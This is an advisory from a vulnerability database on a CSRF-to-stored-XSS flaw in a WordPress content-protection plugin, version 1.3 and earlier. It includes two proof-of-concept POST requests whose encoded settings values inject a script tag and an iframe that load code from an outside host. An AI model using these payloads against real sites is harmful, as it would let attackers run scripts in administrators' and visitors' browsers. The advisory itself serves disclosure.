WordPress Plugin Vulnerabilities
Content Copy Protection & Prevent Image Save <= 1.3 - CSRF to Stored Cross-Site Scripting (XSS)
Description
The plugin does not check for CSRF when saving its settings, not perform any validation and sanitisation on them, allowing attackers to make a logged in administrator set arbitrary XSS payloads in them.
Proof of Concept
### -- [ PoC #1 | Authenticated Persistent XSS & XFS | Image saving disabled message text: ] [!] POST /wp-admin/options-general.php?page=Prevent_Content_Copy_and_Image_Save.php HTTP/1.1 Host: example.com User-Agent: Mozilla/5.0 Content-Type: application/x-www-form-urlencoded Content-Length: 228 Cookie: [admin cookies] select=1&CTRLA=1&CTRLC=1&CTRLX=1&CTRLV=1&CTRLINPUT=1&saveimg=1&image_save_msg=%22%3E%3Cscript+src%3Dhttps%3A%2F%2Fm0ze.ru%2Fpayload%2Fa.js%3E%3C%2Fscript%3E&CTRLS=1&cmenu=1&no_menu_msg=PoC+by+m0ze&Save_Options=++Update+Options++ ### -- [ PoC #2 | Authenticated Persistent XSS & XFS | Context menu disabled message text: ] [!] POST /wp-admin/options-general.php?page=Prevent_Content_Copy_and_Image_Save.php HTTP/1.1 Host: example.com User-Agent: Mozilla/5.0 Content-Type: application/x-www-form-urlencoded Content-Length: 234 Cookie: [admin cookies] select=1&CTRLA=1&CTRLC=1&CTRLX=1&CTRLV=1&CTRLINPUT=1&saveimg=1&image_save_msg=PoC+by+m0ze&CTRLS=1&cmenu=1&no_menu_msg=%22%3E%3Ciframe+src%3Dhttps%3A%2F%2Fm0ze.ru%2Fpayload%2Fxfsii.html%3E%3C%2Fiframe%3E&Save_Options=++Update+Options++
Affects Plugins
No known fix - plugin closed
References
YouTube Video
Classification
Miscellaneous
Original Researcher
m0ze
Submitter
m0ze
Submitter website
Submitter twitter
Verified
Yes
Timeline
Publicly Published
2021-04-12 (about 1 years ago)
Added
2021-05-17 (about 1 years ago)
Last Updated
2021-05-24 (about 12 months ago)